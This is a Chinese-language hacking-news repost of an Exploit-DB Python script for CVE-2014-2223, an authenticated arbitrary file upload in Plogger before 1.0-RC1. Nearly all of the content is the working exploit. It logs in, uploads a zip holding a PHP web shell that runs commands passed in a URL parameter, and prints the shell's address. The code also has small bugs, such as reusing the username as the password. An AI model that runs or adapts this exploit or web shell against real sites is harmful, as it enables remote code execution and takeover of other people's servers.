记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

WEB应用漏洞: - Plogger 1.0-RC1 - Authenticated Arbitrary File Upload

2014-08-29 06:05
#!/usr/bin/env python


# Exploit Title: Plogger Authenticated Arbitrary File Upload
# Date: Feb 2014
# Exploit Author: b0z
# Vendor Homepage: www.plogger.org
# Software Link: www.plogger.org/download
# Version: Plogger prior to 1.0-RC1
# CVE : 2014-2223

import hashlib
import os
import zipfile

import requests
import time
import argparse



def login(session,host,username,password):
print "[+] Log in"

session.post('http://%s/plog-admin/plog-upload.php' % host, data={
"plog_username": username,
"plog_password": password,
"action": "log_in"
})

def upload(session):
print "[+] Creating poisoned gift"
## Write the backdoor
backdoor = open(magic + '.php', 'w+', buffering = 0)
backdoor.write("<?php system($_GET['cmd']) ?>")
backdoor.close

# Add true image file to block the race condition (mandatory not null)
image = open(magic + '.png', 'w+', buffering = 0)
image.write('A')
image.close

gift = zipfile.ZipFile(magic + '.zip', mode = 'w')
gift.write(magic + '.php')
gift.write(magic + '.png')
gift.close

os.remove(magic + '.php')
os.remove(magic + '.png')

gift = open(magic + '.zip', 'rb')
files= { "userfile": ("archive.zip", gift)}
session.post('http://%s/plog-admin/plog-upload.php' % host, files=files,
data = {
"destination_radio":"existing",
"albums_menu" : "1",
"new_album_name":"",
"collections_menu":"1",
"upload":"Upload"
})

os.remove(magic + '.zip')
print '[+] Here we go ==> http://%s/plog-content/uploads/archive/%s.php' % (host,magic)

if __name__== "__main__":

parser = argparse.ArgumentParser()
parser.add_argument("--host" , help="Remote host",required=True)
parser.add_argument("--user" , help="Username",required=True)
parser.add_argument("--password" , help="Password",required=True)
args = parser.parse_args()

host = args.host
username = args.user
password = args.user

magic = hashlib.sha1(time.asctime()).hexdigest()

session = requests.session()
login(session,host,username,password)
upload(session)




知识来源: www.exploit-db.com/exploits/34447

阅读:98491 | 评论:0 | 标签:webapps

想收藏或者和大家分享这篇好文章→复制链接地址

“WEB应用漏洞: - Plogger 1.0-RC1 - Authenticated Arbitrary File Upload”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云